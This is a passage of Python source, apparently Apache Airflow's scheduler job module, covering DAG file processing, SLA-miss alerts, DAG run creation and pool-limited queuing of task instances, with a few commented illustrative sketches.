save them to the DB
:type pickle_dags: bool
:param dag_id_white_list: if specified, only examine DAG ID's that are
in this list
:type dag_id_white_list: list[unicode]
:param thread_name: the name to use for the process that is launched
:type thread_name: unicode
        :return: nothing; the result is sent back through result_channel
"""
# This helper runs in the newly created process
log = logging.getLogger("airflow.processor")
stdout = StreamLogWriter(log, logging.INFO)
stderr = StreamLogWriter(log, logging.WARN)
set_context(log, file_path)
setproctitle("airflow scheduler - DagFileProcessor {}".format(file_path))
try:
# redirect stdout/stderr to log
sys.stdout = stdout
sys.stderr = stderr
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
start_time = time.time()
log.info("Started process (PID=%s) to work on %s",
os.getpid(), file_path)
scheduler_job = SchedulerJob(dag_ids=dag_id_white_list, log=log)
result = scheduler_job.process_file(file_path, pickle_dags)
result_channel.send(result)
end_time = time.time()
log.info(
"Processing %s took %.3f seconds", file_path, end_time - start_time
)
except Exception:
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
result_channel.close()
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
def start(self):
"""
Launch the process and start processing the DAG.
"""
self._parent_channel, _child_channel = multiprocessing.Pipe()
self._process = multiprocessing.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
self.file_path,
self._pickle_dags,
self._dag_id_white_list,
"DagFileProcessor{}".format(self._instance_id),
),
name="DagFileProcessor{}-Process".format(self._instance_id)
)
self._start_time = timezone.utcnow()
self._process.start()
def kill(self):
"""
Kill the process launched to process the file, and ensure consistent state.
"""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
# The queue will likely get corrupted, so remove the reference
self._result_queue = None
self._kill_process()
def terminate(self, sigkill=False):
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
self._process.join(5)
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self):
if self._process.is_alive():
self.log.warning("Killing PID %s", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
@property
def pid(self):
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self):
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self):
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
pass
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self):
"""
:return: result of running SchedulerJob.process_file()
:rtype: airflow.utils.dag_processing.SimpleDag
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self):
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
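# A standalone sketch (not Airflow code) of the Pipe + Process pattern used
# by DagFileProcessor above: the child pushes one result object through its
# end of the pipe, and the parent polls for it without blocking.
#
#   import multiprocessing
#
#   def _child(channel):
#       channel.send('result')   # stands in for process_file()'s return value
#       channel.close()
#
#   if __name__ == '__main__':
#       parent, child = multiprocessing.Pipe()
#       proc = multiprocessing.Process(target=_child, args=(child,))
#       proc.start()
#       if parent.poll(5):       # mirrors DagFileProcessor.done
#           print(parent.recv())
#       proc.join()
#       parent.close()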
class SchedulerJob(BaseJob):
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: unicode
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[unicode]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: unicode
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {
'polymorphic_identity': 'SchedulerJob'
}
heartrate = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
dag_id=None,
dag_ids=None,
subdir=settings.DAGS_FOLDER,
num_runs=conf.getint('scheduler', 'num_runs'),
processor_poll_interval=conf.getfloat('scheduler', 'processor_poll_interval'),
do_pickle=False,
log=None,
*args, **kwargs):
# for BaseJob compatibility
self.dag_id = dag_id
self.dag_ids = [dag_id] if dag_id else []
if dag_ids:
self.dag_ids.extend(dag_ids)
self.subdir = subdir
self.num_runs = num_runs
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super().__init__(*args, **kwargs)
self.max_threads = conf.getint('scheduler', 'max_threads')
if log:
self._log = log
self.using_sqlite = False
if 'sqlite' in conf.get('core', 'sql_alchemy_conn'):
self.using_sqlite = True
self.max_tis_per_query = conf.getint('scheduler', 'max_tis_per_query')
self.processor_agent = None
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame):
"""
Helper method to clean up processor_agent to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def is_alive(self, grace_multiplier=None):
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING and
(timezone.utcnow() - self.latest_heartbeat).seconds < scheduler_health_check_threshold
)
@provide_session
def manage_slas(self, dag, session=None):
"""
        Find all tasks that have SLAs defined and send alert emails
        where needed. New SLA misses are also recorded in the database.
        We assume that the scheduler runs often, so we only check for
        tasks that should have succeeded in the past hour.
"""
if not any([isinstance(ti.sla, timedelta) for ti in dag.tasks]):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
TI = models.TaskInstance
sq = (
session
.query(
TI.task_id,
func.max(TI.execution_date).label('max_ti'))
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(or_(
TI.state == State.SUCCESS,
TI.state == State.SKIPPED))
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id).subquery('sq')
)
max_tis = session.query(TI).filter(
TI.dag_id == dag.dag_id,
TI.task_id == sq.c.task_id,
TI.execution_date == sq.c.max_ti,
).all()
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
dttm = ti.execution_date
if isinstance(task.sla, timedelta):
dttm = dag.following_schedule(dttm)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(SlaMiss(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=dttm,
timestamp=ts))
dttm = dag.following_schedule(dttm)
session.commit()
slas = (
session
.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa pylint: disable=singleton-comparison
.all()
)
if slas:
sla_dates = [sla.execution_date for sla in slas]
qry = (
session
.query(TI)
.filter(
TI.state != State.SUCCESS,
TI.execution_date.in_(sla_dates),
TI.dag_id == dag.dag_id
).all()
)
blocking_tis = []
for ti in qry:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([
sla.task_id + ' on ' + sla.execution_date.isoformat()
for sla in slas])
blocking_task_list = "\n".join([
ti.task_id + ' on ' + ti.execution_date.isoformat()
for ti in blocking_tis])
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info(' --------------> ABOUT TO CALL SLA MISS CALL BACK ')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas,
blocking_tis)
notification_sent = True
except Exception:
self.log.exception("Could not call sla_miss_callback for DAG %s",
dag.dag_id)
email_content = """\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n<code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}\n{bug}<code></pre>
""".format(task_list=task_list, blocking_task_list=blocking_task_list,
bug=asciiart.bug)
emails = set()
for task in dag.tasks:
if task.email:
if isinstance(task.email, str):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(
emails,
"[airflow] SLA miss on DAG=" + dag.dag_id,
email_content)
email_sent = True
notification_sent = True
except Exception:
self.log.exception("Could not send SLA Miss email notification for"
" DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
if email_sent:
sla.email_sent = True
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session, dagbag):
"""
        For the DAGs in the given DagBag, record any associated import errors and clear
        errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.models.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(
errors.ImportError.filename == dagbag_file
).delete()
# Add the errors of the processed files
for filename, stacktrace in dagbag.import_errors.items():
session.add(errors.ImportError(
filename=filename,
stacktrace=stacktrace))
session.commit()
@provide_session
def create_dag_run(self, dag, session=None):
"""
This method checks whether a new DagRun needs to be created
for a DAG based on scheduling interval.
Returns DagRun if one is scheduled. Otherwise returns None.
"""
if dag.schedule_interval and conf.getboolean('scheduler', 'USE_JOB_SCHEDULE'):
active_runs = DagRun.find(
dag_id=dag.dag_id,
state=State.RUNNING,
external_trigger=False,
session=session
)
# return if already reached maximum active runs and no timeout setting
if len(active_runs) >= dag.max_active_runs and not dag.dagrun_timeout:
return
timedout_runs = 0
for dr in active_runs:
if (
dr.start_date and dag.dagrun_timeout and
dr.start_date < timezone.utcnow() - dag.dagrun_timeout):
dr.state = State.FAILED
dr.end_date = timezone.utcnow()
dag.handle_callback(dr, success=False, reason='dagrun_timeout',
session=session)
timedout_runs += 1
session.commit()
if len(active_runs) - timedout_runs >= dag.max_active_runs:
return
# this query should be replaced by find dagrun
qry = (
session.query(func.max(DagRun.execution_date))
.filter_by(dag_id=dag.dag_id)
.filter(or_(
DagRun.external_trigger == False, # noqa: E712 pylint: disable=singleton-comparison
# add % as a wildcard for the like query
DagRun.run_id.like(DagRun.ID_PREFIX + '%')
))
)
last_scheduled_run = qry.scalar()
# don't schedule @once again
if dag.schedule_interval == '@once' and last_scheduled_run:
return None
            # don't do scheduler catchup for DAGs that don't have catchup=True
if not (dag.catchup or dag.schedule_interval == '@once'):
# The logic is that we move start_date up until
# one period before, so that timezone.utcnow() is AFTER
# the period end, and the job can be created...
now = timezone.utcnow()
next_start = dag.following_schedule(now)
last_start = dag.previous_schedule(now)
if next_start <= now:
new_start = last_start
else:
new_start = dag.previous_schedule(last_start)
if dag.start_date:
if new_start >= dag.start_date:
dag.start_date = new_start
else:
dag.start_date = new_start
next_run_date = None
if not last_scheduled_run:
# First run
task_start_dates = [t.start_date for t in dag.tasks]
if task_start_dates:
next_run_date = dag.normalize_schedule(min(task_start_dates))
self.log.debug(
"Next run date based on tasks %s",
next_run_date
)
else:
next_run_date = dag.following_schedule(last_scheduled_run)
# make sure backfills are also considered
last_run = dag.get_last_dagrun(session=session)
if last_run and next_run_date:
while next_run_date <= last_run.execution_date:
next_run_date = dag.following_schedule(next_run_date)
# don't ever schedule prior to the dag's start_date
if dag.start_date:
next_run_date = (dag.start_date if not next_run_date
else max(next_run_date, dag.start_date))
if next_run_date == dag.start_date:
next_run_date = dag.normalize_schedule(dag.start_date)
self.log.debug(
"Dag start date: %s. Next run date: %s",
dag.start_date, next_run_date
)
# don't ever schedule in the future or if next_run_date is None
if not next_run_date or next_run_date > timezone.utcnow():
return
# this structure is necessary to avoid a TypeError from concatenating
# NoneType
if dag.schedule_interval == '@once':
period_end = next_run_date
elif next_run_date:
period_end = dag.following_schedule(next_run_date)
# Don't schedule a dag beyond its end_date (as specified by the dag param)
if next_run_date and dag.end_date and next_run_date > dag.end_date:
return
# Don't schedule a dag beyond its end_date (as specified by the task params)
# Get the min task end date, which may come from the dag.default_args
min_task_end_date = []
task_end_dates = [t.end_date for t in dag.tasks if t.end_date]
if task_end_dates:
min_task_end_date = min(task_end_dates)
if next_run_date and min_task_end_date and next_run_date > min_task_end_date:
return
if next_run_date and period_end and period_end <= timezone.utcnow():
next_run = dag.create_dagrun(
run_id=DagRun.ID_PREFIX + next_run_date.isoformat(),
execution_date=next_run_date,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False
)
return next_run
@provide_session
def _process_task_instances(self, dag, task_instances_list, session=None):
"""
This method schedules the tasks for a single DAG by looking at the
active DAG runs and adding task instances that should run to the
queue.
"""
# update the state of the previously active dag runs
dag_runs = DagRun.find(dag_id=dag.dag_id, state=State.RUNNING, session=session)
active_dag_runs = []
for run in dag_runs:
self.log.info("Examining DAG run %s", run)
# don't consider runs that are executed in the future
if run.execution_date > timezone.utcnow():
self.log.error(
"Execution date is in future: %s",
run.execution_date
)
continue
if len(active_dag_runs) >= dag.max_active_runs:
self.log.info("Number of active dag runs reached max_active_run.")
break
# skip backfill dagruns for now as long as they are not really scheduled
if run.is_backfill:
continue
# todo: run.dag is transient but needs to be set
run.dag = dag
# todo: preferably the integrity check happens at dag collection time
run.verify_integrity(session=session)
run.update_state(session=session)
if run.state == State.RUNNING:
make_transient(run)
active_dag_runs.append(run)
for run in active_dag_runs:
self.log.debug("Examining active DAG run: %s", run)
# this needs a fresh session sometimes tis get detached
tis = run.get_task_instances(state=(State.NONE,
State.UP_FOR_RETRY,
State.UP_FOR_RESCHEDULE))
# this loop is quite slow as it uses are_dependencies_met for
# every task (in ti.is_runnable). This is also called in
# update_state above which has already checked these tasks
for ti in tis:
task = dag.get_task(ti.task_id)
# fixme: ti.task is transient but needs to be set
ti.task = task
if ti.are_dependencies_met(
dep_context=DepContext(flag_upstream_failed=True),
session=session):
self.log.debug('Queuing task: %s', ti)
task_instances_list.append(ti.key)
@provide_session
def _change_state_for_tis_without_dagrun(self,
simple_dag_bag,
old_states,
new_state,
session=None):
"""
For all DAG IDs in the SimpleDagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
normally should not happen, but it can if the state of DagRuns are
changed manually.
        :param old_states: examine TaskInstances in these states
        :type old_states: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag and with states in the old_state will be examined
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
tis_changed = 0
query = session \
.query(models.TaskInstance) \
.outerjoin(models.DagRun, and_(
models.TaskInstance.dag_id == models.DagRun.dag_id,
models.TaskInstance.execution_date == models.DagRun.execution_date)) \
.filter(models.TaskInstance.dag_id.in_(simple_dag_bag.dag_ids)) \
.filter(models.TaskInstance.state.in_(old_states)) \
.filter(or_(
models.DagRun.state != State.RUNNING,
models.DagRun.state.is_(None)))
if self.using_sqlite:
tis_to_change = query \
.with_for_update() \
.all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
tis_changed = session \
.query(models.TaskInstance) \
.filter(and_(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date ==
subq.c.execution_date)) \
.update({models.TaskInstance.state: new_state},
synchronize_session=False)
session.commit()
if tis_changed > 0:
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed, new_state
)
@provide_session
def __get_concurrency_maps(self, states, session=None):
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from (dag_id, task_id) to # of task instances and
a map from (dag_id, task_id) to # of task instances in the given state list
:rtype: dict[tuple[str, str], int]
"""
TI = models.TaskInstance
ti_concurrency_query = (
session
.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map = defaultdict(int)
task_map = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
@provide_session
def _find_executable_task_instances(self, simple_dag_bag, states, session=None):
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param executor: the executor that runs task instances
:type executor: BaseExecutor
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: list[airflow.models.TaskInstance]
"""
from airflow.jobs.backfill_job import BackfillJob # Avoid circular import
executable_tis = []
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
ti_query = (
session
.query(TI)
.filter(TI.dag_id.in_(simple_dag_bag.dag_ids))
.outerjoin(
DR,
and_(DR.dag_id == TI.dag_id, DR.execution_date == TI.execution_date)
)
.filter(or_(DR.run_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DR.run_id.like(BackfillJob.ID_PREFIX + '%'))))
.outerjoin(DM, DM.dag_id == TI.dag_id)
.filter(or_(DM.dag_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DM.is_paused)))
)
# Additional filters on task instance state
if None in states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(states)) # noqa: E711 pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(states))
task_instances_to_examine = ti_query.all()
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join(
[repr(x) for x in task_instances_to_examine])
self.log.info(
"%s tasks up for execution:\n\t%s", len(task_instances_to_examine),
task_instance_str
)
# Get the pool settings
pools = {p.pool: p for p in session.query(models.Pool).all()}
pool_to_task_instances = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
states_to_count_as_running = [State.RUNNING, State.QUEUED]
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=states_to_count_as_running, session=session)
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning(
"Tasks using non-existent pool '%s' will not be scheduled",
pool
)
continue
else:
open_slots = pools[pool].open_slots(session=session)
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool, open_slots, num_ready
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date))
# Number of tasks that cannot be scheduled because of no open slot in pool
num_starving_tasks = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info(
"Not scheduling since there are %s open slots in pool %s",
open_slots, pool
)
# Can't schedule any more since there are no more open slots.
num_starving_tasks = len(priority_sorted_task_instances) - current_index
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
simple_dag = simple_dag_bag.get_dag(dag_id)
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = simple_dag_bag.get_dag(dag_id).concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id, current_dag_concurrency, dag_concurrency_limit
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance, dag_id, dag_concurrency_limit
)
continue
task_concurrency_limit = simple_dag.get_task_special_arg(
task_instance.task_id,
'task_concurrency')
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info("Not executing %s since the task concurrency for"
" this task has been reached.", task_instance)
continue
if self.executor.has_task(task_instance):
self.log.debug(
"Not handling task %s as the executor reports it is running",
task_instance.key
)
continue
executable_tis.append(task_instance)
open_slots -= 1
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge('pool.starving_tasks.{pool_name}'.format(pool_name=pool_name),
num_starving_tasks)
Stats.gauge('pool.open_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].open_slots())
Stats.gauge('pool.used_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].occupied_slots())
task_instance_str = "\n\t".join(
[repr(x) for x in executable_tis])
self.log.info(
"Setting the following tasks to queued state:\n\t%s", task_instance_str)
# so these don't expire on commit
for ti in executable_tis:
copy_dag_id = ti.dag_id
copy_execution_date = ti.execution_date
copy_task_id = ti.task_id
make_transient(ti)
ti.dag_id = copy_dag_id
ti.execution_date = copy_execution_date
ti.task_id = copy_task_id
return executable_tis
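# Editor's note -- an illustrative sketch (hypothetical, not part of the
# scheduler): the priority sort in _find_executable_task_instances above
# orders task instances by descending priority_weight and, within equal
# priorities, by ascending execution_date (oldest first).
def _demo_priority_sort():
    from collections import namedtuple
    TI = namedtuple('TI', ['task_id', 'priority_weight', 'execution_date'])
    tis = [TI('a', 1, 2), TI('b', 5, 9), TI('c', 5, 1)]
    ordered = sorted(tis, key=lambda ti: (-ti.priority_weight, ti.execution_date))
    # 'c' (priority 5, older) sorts before 'b' (priority 5, newer),
    # followed by 'a' (priority 1).
    assert [ti.task_id for ti in ordered] == ['c', 'b', 'a']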
@provide_session
def _change_state_for_executable_task_instances(self, task_instances,
acceptable_states, session=None):
"""
Changes the state of task instances in the list with one of the given states
to QUEUED atomically, and returns the TIs changed in SimpleTaskInstance format.
:param task_instances: TaskInstances to change the state of
:type task_instances: list[airflow.models.TaskInstance]
:param acceptable_states: Filters the TaskInstances updated to be in these states
:type acceptable_states: Iterable[State]
:rtype: list[airflow.utils.dag_processing.SimpleTaskInstance]
"""
if len(task_instances) == 0:
session.commit()
return []
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == ti.dag_id,
TI.task_id == ti.task_id,
TI.execution_date == ti.execution_date)
for ti in task_instances])
ti_query = (
session
.query(TI)
.filter(or_(*filter_for_ti_state_change)))
if None in acceptable_states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(acceptable_states)) # noqa pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(acceptable_states))
tis_to_set_to_queued = (
ti_query
.with_for_update()
.all())
if len(tis_to_set_to_queued) == 0:
self.log.info("No tasks were able to have their state changed to queued.")
session.commit()
return []
# set TIs to queued state
for task_instance in tis_to_set_to_queued:
task_instance.state = State.QUEUED
task_instance.queued_dttm = (timezone.utcnow()
if not task_instance.queued_dttm
else task_instance.queued_dttm)
session.merge(task_instance)
# Generate a list of SimpleTaskInstances to queue in the executor.
simple_task_instances = [SimpleTaskInstance(ti) for ti in
tis_to_set_to_queued]
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_queued])
session.commit()
self.log.info("Setting the following %s tasks to queued state:\n\t%s",
len(tis_to_set_to_queued), task_instance_str)
return simple_task_instances
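# Editor's note -- an illustrative sketch (hypothetical, not part of the
# scheduler): the filter built in the method above is an OR over one AND
# clause per task-instance key, so a single query can select an arbitrary
# set of (dag_id, task_id, execution_date) rows. The shape, using plain
# SQLAlchemy column expressions:
def _demo_key_filter():
    from sqlalchemy import and_, or_
    from sqlalchemy.sql import column
    keys = [('dag_a', 'task_1'), ('dag_b', 'task_2')]
    clause = or_(*[and_(column('dag_id') == d, column('task_id') == t)
                   for d, t in keys])
    # str(clause) renders roughly as:
    #   dag_id = :dag_id_1 AND task_id = :task_id_1
    #   OR dag_id = :dag_id_2 AND task_id = :task_id_2
    return str(clause)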
def _enqueue_task_instances_with_queued_state(self, simple_dag_bag,
simple_task_instances):
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param simple_task_instances: TaskInstances to enqueue
:type simple_task_instances: list[SimpleTaskInstance]
:param simple_dag_bag: Should contain all of the task_instances' dags
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
TI = models.TaskInstance
# actually enqueue them
for simple_task_instance in simple_task_instances:
simple_dag = simple_dag_bag.get_dag(simple_task_instance.dag_id)
command = TI.generate_command(
simple_task_instance.dag_id,
simple_task_instance.task_id,
simple_task_instance.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=simple_task_instance.pool,
file_path=simple_dag.full_filepath,
pickle_id=simple_dag.pickle_id)
priority = simple_task_instance.priority_weight
queue = simple_task_instance.queue
self.log.info(
"Sending %s to executor with priority %s and queue %s",
simple_task_instance.key, priority, queue
)
self.executor.queue_command(
simple_task_instance,
command,
priority=priority,
queue=queue)
@provide_session
def _execute_task_instances(self,
simple_dag_bag,
states,
session=None):
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
and that we do not exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: Number of task instances with state changed.
"""
executable_tis = self._find_executable_task_instances(simple_dag_bag, states,
session=session)
def query(result, items):
simple_tis_with_state_changed = \
self._change_state_for_executable_task_instances(items,
states,
session=session)
self._enqueue_task_instances_with_queued_state(
simple_dag_bag,
simple_tis_with_state_changed)
session.commit()
return result + len(simple_tis_with_state_changed)
return helpers.reduce_in_chunks(query, executable_tis, 0, self.max_tis_per_query)
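# Editor's note -- an illustrative sketch (hypothetical): a pure-Python
# equivalent of the chunked reduction above. reduce_in_chunks feeds the
# callable successive slices of at most chunk_size items and threads the
# accumulator through, so at most max_tis_per_query TIs are queried and
# queued per round trip. (The real helper may differ in edge cases.)
def _demo_reduce_in_chunks(fn, items, initial, chunk_size):
    acc = initial
    if chunk_size <= 0:
        chunk_size = len(items) or 1  # treat 0 as "no limit"
    for start in range(0, len(items), chunk_size):
        acc = fn(acc, items[start:start + chunk_size])
    return acc

assert _demo_reduce_in_chunks(lambda acc, chunk: acc + len(chunk),
                              list(range(10)), 0, 4) == 10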
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if self.executor.queued_tasks:
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# TI.try_number returns the raw try_number + 1 when the TI is not
# running, so subtract 1 to match the DB record.
TI._try_number == try_number - 1,
TI.state == State.QUEUED)
for dag_id, task_id, execution_date, try_number
in self.executor.queued_tasks.keys()])
ti_query = (session.query(TI)
.filter(or_(*filter_for_ti_state_change)))
tis_to_set_to_scheduled = (ti_query
.with_for_update()
.all())
if len(tis_to_set_to_scheduled) == 0:
session.commit()
return
# set TIs back to scheduled state
for task_instance in tis_to_set_to_scheduled:
task_instance.state = State.SCHEDULED
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_scheduled])
session.commit()
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
def _process_dags(self, dagbag, dags, tis_out):
"""
Iterates over the dags and processes them. Processing includes:
1. Create appropriate DagRun(s) in the DB.
2. Create appropriate TaskInstance(s) in the DB.
3. Send emails for tasks that have missed SLAs.
:param dagbag: a collection of DAGs to process
:type dagbag: airflow.models.DagBag
:param dags: the DAGs from the DagBag to process
:type dags: airflow.models.DAG
:param tis_out: A list to which the keys of generated TaskInstances are added
:type tis_out: list[tuple]
:rtype: None
"""
for dag in dags:
dag_id = dag.dag_id
dag = dagbag.get_dag(dag_id)
if not dag:
self.log.error("DAG ID %s was not found in the DagBag", dag_id)
continue
if dag.is_paused:
self.log.info("Not processing DAG %s since it's paused", dag.dag_id)
continue
